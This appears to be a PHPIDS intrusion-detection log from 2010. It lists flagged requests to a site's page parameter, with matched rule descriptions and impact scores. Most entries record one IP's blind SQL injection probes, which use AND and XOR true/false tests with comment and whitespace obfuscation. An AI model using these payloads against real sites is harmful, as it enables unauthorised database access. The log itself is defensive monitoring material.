| ID: | 123292 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 02:39:59 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123289 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'`([{^~ | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E | | IP: | 60.4.51.66 | | Impact: | 24 | | Created: | 2010-05-03 02:39:55 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.8666666666667 Converted: ((((+++::
|
| ID: | 123290 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'`([{^~ | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E | | IP: | 60.4.51.66 | | Impact: | 24 | | Created: | 2010-05-03 02:39:55 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.8666666666667 Converted: ((((+++::
|
| ID: | 123287 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:49 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123288 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:49 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123285 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:48 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123286 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/XoR/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:48 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123283 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 01:13:47 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123284 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 01:13:47 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123281 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 01:13:46 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123282 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 01:13:46 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123277 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 01:13:45 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123278 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 01:13:45 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123279 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 01:13:45 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123280 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' XoR '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 38 | | Created: | 2010-05-03 01:13:45 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123275 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 01:13:44 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123276 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 01:13:44 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123273 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 01:13:42 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123274 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/XoR/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 01:13:42 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123271 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:27 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123272 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:27 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123269 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:25 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123270 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:25 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123267 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:23 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123268 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:23 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123265 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:21 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123266 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:21 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123263 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:20 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123264 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:20 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123261 | | Name: | REQUEST.page | | Value: | backtrack-3-man/dsniff/usr/local/lib/dsniff.magic | | Page: | /i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic | | IP: | 66.249.67.227 | | Impact: | 10 | | Created: | 2010-05-03 01:13:18 | | Details: | Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
|
| ID: | 123262 | | Name: | GET.page | | Value: | backtrack-3-man/dsniff/usr/local/lib/dsniff.magic | | Page: | /i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic | | IP: | 66.249.67.227 | | Impact: | 10 | | Created: | 2010-05-03 01:13:18 | | Details: | Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
|
| ID: | 123259 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:16 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123260 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated%' aND '8%'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:16 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123257 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:12 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123258 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:12 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123255 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:10 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123256 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'/**/aND/**/'8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 66 | | Created: | 2010-05-03 01:13:10 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123253 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 01:13:09 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123254 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=3 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 01:13:09 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123251 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 01:13:08 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123252 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated/**/aND/**/8=8 | | Page: | /i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8 | | IP: | 60.4.51.66 | | Impact: | 6 | | Created: | 2010-05-03 01:13:08 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123249 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:07 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123250 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:07 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123247 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:06 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123248 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:06 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123245 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:02 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123246 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='3 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:02 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123243 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:01 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123244 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated' aND '8'='8 | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278 | | IP: | 60.4.51.66 | | Impact: | 46 | | Created: | 2010-05-03 01:13:01 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
